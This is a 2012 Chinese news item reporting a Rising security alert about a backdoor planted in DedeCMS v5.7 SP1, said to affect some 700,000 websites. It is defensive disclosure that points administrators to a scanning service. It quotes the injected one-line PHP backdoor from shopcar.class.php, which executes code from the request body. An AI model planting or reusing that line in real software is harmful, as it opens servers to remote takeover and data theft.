瑞星緊急警示:織夢CMS系統驚現后門 70萬網站資料恐不保
2012-03-22 11:01:56摘要:瑞星公司今日對外發布緊急警示:國內知名的PHP開源網站管理系統——織夢CMS(DedeCms)v5.7 sp1版本被發現植入后門,黑客可通過此后門直接獲得網站的控制權限,獲取存儲在服務器上的文件和數據庫。
瑞星公司今日對外發布緊急警示:國內知名的PHP開源網站管理系統——織夢CMS(DedeCms)v5.7 sp1版本被發現植入后門,黑客可通過此后門直接獲得網站的控制權限,獲取存儲在服務器上的文件和數據庫。據CMS官方數據顯示,目前約有70萬網站使用該系統搭建,涉及企業、政府機關、媒體機構、行業及個人網站等。瑞星公司特此緊急提醒使用該系統的網站管理員,使用瑞星網站密碼安全檢測系統查找后門并及時進行封堵。
據瑞星專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門,黑客只需要構造簡單的數據包提交到服務器,就能夠獲取到該網站的WebShell,通過對服務器進一步滲透攻擊,進而獲取服務器的最高權限。
CMS中被植入的后門代碼
在黑客攻陷網站后,便可以直接訪問服務器上的文件、數據庫等信息。目前我國有大量網站采用該系統,此后門或將導致大量用戶的信息泄露,造成極為嚴重的影響。
針對此后門事件,瑞星對其網站密碼安全檢測系統(http://union.rising.com.cn/)進行了緊急升級,各位網管可使用該系統對自己的網站進行安全掃描,并免費獲得瑞星針對此后門的修補建議。
[責任編輯:秦溢博]
